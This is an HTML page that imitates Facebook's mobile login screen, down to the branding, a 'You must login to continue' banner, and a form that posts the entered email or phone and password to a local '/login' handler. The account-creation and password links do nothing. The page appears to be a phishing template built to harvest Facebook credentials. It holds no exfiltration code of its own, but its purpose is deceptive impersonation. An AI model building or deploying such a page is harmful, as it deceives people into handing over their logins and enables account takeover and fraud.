<html>
	<head>
		<title>Facebook - Log In or Sign Up</title>
		<link rel="shortcut icon" type="image/svg" href="facebook.svg"/>
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<link rel="preconnect" href="https://fonts.googleapis.com">
		<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
		<link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
		<style type="text/css">
			*{
				margin: 0;
				position: relative;;
			}
			body{
				background-color: #edf7ff;
			}
			.logo{
				width: 100%;
				background-color: #3B5998;
				height: 50px;
			}
			.logo-img img{
				margin-top: 10px;
				position: relative;
			}
			.login-first{
				border: 1px solid #E5CE3A;
				width: 100%;
				background-color: #FFFBE2;
				height: 30px;
			}
			.login-first p{
				color: #9f7d2d;
				font: sans-serif;
				font-family: 'Roboto', sans-serif;
			}
			.login-first-text{
				margin-top: 5px;
			}
			.input-block{
				margin-top: 100px;
			}
			.input-block input{
				width: 325px;
				background-color: white;
				height: 40px;
				border: 1px solid #dbdbdb;
			}
			.input-block input[type=text]{
				border-bottom: none;
				border-radius: 3px 3px 0px 0px;
			}
			.input-block input[type=password]{
				border-radius: 0px 0px 3px 3px;
			}
			.input-block input[type=submit]{
				margin-top: 15px;
				color: white;
				background-color: 1877F2;
				border: 1px solid #1877F2;
				border-radius: 5px;
			}
			.create-account-block{
				margin-top: 5%;
			}
			.create-account-block button{
				color: white;
				background-color: #00A400;
				width: 250px;
				height: 35px;
				border: 1px solid #00A400;
				border-radius: 5px;
			}
			.forget-password-block{
				margin-top: 3%;
				font-size: 13px;
				color: #548ad6;
				font-family: 'Roboto', sans-serif;
			}
			.footer{
				margin-top: 100px;
				width: 100%;
				height: 37%;
				background-color: white;
			}
			.footer p{
				margin-top: 6px;
			}
			.left{
				float: left;
				width: 50%;
				height: 100%;
				text-align: center;
			}
			.right{
				float: right;
				width: 50%;
				height: 100%;
				text-align: center;
			}
			.left-lang, .right-lang{
				font-family: 'Roboto', sans-serif;
				font-size: 13px;
				margin-top: 25px;
				color: #475e90;
			}
		</style>
	</head>
	<body>
		<div class='logo'>
			<div class='logo-img'>
				<center><img src="https://gcdnb.pbrd.co/images/zkz6Q6cXhod9.png?o=1"></center>
			</div>
		</div>
		<div class='login-first'>
			<div class="login-first-text">
				<center><p>You must login to continue<p></center>
			</div>
		</div>
		<div class='input-block'>
			<center>
				<form method="POST" action="/login">
					<input type="text" name="name" placeholder="   Mobile number or email"><br/>
					<input type='password' name="password" placeholder="   Password"><br/>
					<strong><input type="submit" name="submit" value='Log In'></strong>
				</form>
				<div class='create-account-block'>
					<button>Create New Account</button>	
				</div>
				<div class='forget-password-block'>
					<a>Forget Password?</a>
				</div>
			</center>
		</div>
		<div class='footer'>
			<div class='left'>
				<div class='left-lang'>
					<strong><p style="">English(US)</p></strong>
					<p>Bisaya</p>
					<p>Korean</p>
					<p>Portugues</p>
					
				</div>
			</div>
			<div class='right'>
				<div class='right-lang'>
					<p>Filipino</p>
					<p>Spanish</p>
					<p>Chinese(Simplified)</p>
					<p>Japanese</p>
				</div>
			</div>
		</div>
	</body>

</html>
